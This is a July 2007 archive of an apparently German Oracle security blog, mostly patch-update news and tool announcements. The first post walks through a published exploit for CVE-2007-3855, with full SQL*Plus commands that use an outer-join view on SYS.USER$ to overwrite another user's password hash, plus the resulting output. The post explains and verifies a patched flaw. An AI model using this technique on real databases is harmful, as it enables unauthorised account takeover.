Archive for Juli, 2007

Exploit für Create-View Problem wurde veröffentlicht

Sonntag, Juli 22nd, 2007

Andrea Purificato hat auf seiner Webseite einen Exploit für das Create-View-Problem (DB17 bzw CVE-2007-3855, das von RDS an Oracle gemeldet), das mit dem Juli 2007 CPU korrigiert wurde.

In dem veröffentlichten Exploit wird über eine View das Passwort in der Tabelle SYS.USER$ mit Hilfe des Update Kommandos aktualisiert. Ganz so wie auf der Webseite beschrieben, funktioniert dieser Exploit aber dennoch nicht, da man Passworte nicht direkt (und von Oracle supported) via Update ändern kann.

Beispiel:
— Zuerst berechnen wir Offline den Passwort Hash für den Benutzer RDS und die Passworte RDS und HACKED
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

— Im nächsten Schritt verbinden wir uns zur Datenbank und aktualisieren den Passwort-Hash über das Update Kommando
SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2    select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;

View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS‘;

1 row updated.

SQL> commit;

Commit complete.

— Das Passwort ist nun auf HACKED geändert worden.

SQL> select password from sys.user$ where name=’RDS‘;

PASSWORD
——————————
7B843A192FF96BE9
— Aber dennoch klappt der Connect nicht…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

— Damit dieser Exploit zusammen mit der Passwort-Änderung funktioniert, muss man allerdings  die Datenbank neu starten. Nach dem Neustart funktioniert dann der per Update gesetzte Passwort Hash.

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 – Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle.  All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 – Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>

Database Napply CPUs oder Welche Moleküle hast Du denn installiert?

Dienstag, Juli 17th, 2007

Wie Eric Maurice von Oracle gerade auf dem Oracle Global Product Security Blog veröffentlicht hat, führt Oracle bei diesen CPU’s (und allen folgenden 10.2.0.4 und 11g) eine Neuigkeit ein, sogenannte „Database Napply CPUs“.

Diese Napply Patches sind in sogenannte Moleküle (molecules) aufgeteilt. Jedes Molekül ist absolut unabhängig voneinander und kann unabhängig installiert werden. Dadurch sind Patchkonflikte einfacher zu lösen.

Eine interessante Idee für alle DBAs die wegen Patchkonflikten keine vollständigen CPUs auf einer Datenbank einspielen können.

Eine Metalink Note zu diesem Thema findet sich hier.

In Zukunft wird unter DBAs wohl eher heissen: „Welche Moleküle hast Du denn installiert?“

Oracle CPU Juli 2007 veröffentlicht

Dienstag, Juli 17th, 2007

Oracle hat soeben seinen CPU Juli 2007 veröffentlicht. In diesem CPU werden 3 Sicherheitslücken, die Red-Database-Security GmbH gemeldet hat, korrigiert.

Diese Fehler sind 2 SQL Injection Lücken (Apex und dbms_prvtaqis) wird ein kritischer Fehler in Datenbank-Views korrigiert. Der Fehler in den Views, nicht zu verwechseln mit denjenigen, die letztes Jahr im April und Oktober 2006, wurde korrigiert. Dabei kann ein Benutzer mit Lese-Rechten über spezielle zusammengesetzte Views Insert/Update/Delete Statements ausführen ohne die entsprechenden Rechte zu besitzen.

Dabei handelt es sich um ein Problem des Oracle Optimizers (Hallo Trivadis: Bitte auch den Optimizer testen 😉 )
Unsere Analyse findet sich wie üblich bei Red-Database-Security.

Oracle University Guru Seminare

Freitag, Juli 13th, 2007

Die Oracle University bietet Guru Seminare zu verschiedenen Themen an. Unter anderem am 18. Oktober in München zum Thema Oracle Security. Dort werde ich neben Oracle Hacking  auch den Oracle CPU October 2007 behandeln, der kurz vorher rausgekommen ist.

Die Platzanzahl ist begrenzt. Wie immer gilt: Wer zuerst kommt malt zuerst.

Oracle Critical Patch Update Juli 2007 korrigiert 46 Lücken

Donnerstag, Juli 12th, 2007

Oracle hat die Vorankündigung für Oracle CPU Juli 2007 veröffentlicht. Insgesamt werden in der Oracle Datenbank 20 neue Sicherheitslücken korrigiert. Eine Korrektur ist für Oracle APEX (wurde von Red-Database-Security gemeldet) und ist bereits in Apex 3.0.1 bzw. Oracle 11g, dass 3.0.1 enthält, veröffentlicht. Welche anderen Lücken von RDS korrigiert wurden (siehe upcoming alerts von RDS), ist noch nicht bekannt.
2 Lücken sind remote ohne Benutzername und Passwort ausnutzbar.

Client-installationen sind diesmal nicht davon betroffen.

Im Oracle Application Server wurden 4 Lücken, Collabsuite 1 Fehler, E-Business-Suite 14, die restlichen Fehler sind in Peoplesoft. Die höchsten Lücken haben ein CVSS-Rating von 4.8, also relativ hoch.

Versteigerung von Sicherheitslücken

Montag, Juli 9th, 2007

Die in der Schweiz registrierte Firma WSLabi verkauft Sicherheitslücken (Exploits). Dazu stellt WSLabi eine Auktionsplattform zur Verfügung über die Sicherheitslücken gekauft und verkauft werden können.

Ein Artikel mit Details findet sich bei Securityfocus.

Der Trend Sicherheitslücken (für möglichst viel Geld) zu verkaufen anstatt dem Hersteller umsonst mitzuteilen, zeichnet sich seit den letzten 2 Jahren ab. Je sicherer die Software wird/ist, desto höher der Preis.

Probleme Oracle CPU April 2007 & Oracle 8.0.5 Clients

Montag, Juli 2nd, 2007

Nach dem Einspielen des Oracle CPU April 2007 funktioniert der Connect mit Oracle 8.0.5 nicht mehr. Oracle 8.0.5. wird beispielsweise zusammen mit OFSA 4.5 installiert. Ursache dieses Problems ist wahrscheinlich die Änderung des Verhaltens des Login Triggers (DB05 CPUApr2007), da der Alter Session Befehl nun nach dem Login-Trigger anstatt vor dem Login-Trigger ausgeführt wird.

Der entsprechende Metalink Eintrag ist unter „ORA-2248 INVALID OPTION FOR ALTER SESSION WITH FDM AND CPUAPR2007 PATCH“ verfügbar.

Als Workaround schlägt Oracle das Update auf 8.0.6 vor.

checkpwd 1.23 und sidguess für MacOS

Montag, Juli 2nd, 2007

Es gibt nun auch Checkpwd 1.23 und sidguess für Mac OSX als PPC Executable. Die deutsche Version 1.23 von Checkpwd zeigt allerdings nur noch an, ob Passworte schwach sind, aber nicht mehr, wie das Passwort lautet (§202c StGB läßt grüßen…).

Leider gibt es momentan nur eine PPC Version des Oracle Instant Clients für Mac, weshalb auch checkpwd für die PowerPC Architektur kompiliert wurde. Es bleibt zu hoffen, dass Oracle den Instant Client auf die Intel-Architektur migriert.

Hardcopy Checkpwd Mac

Sidguess

Sidguess Mac OSX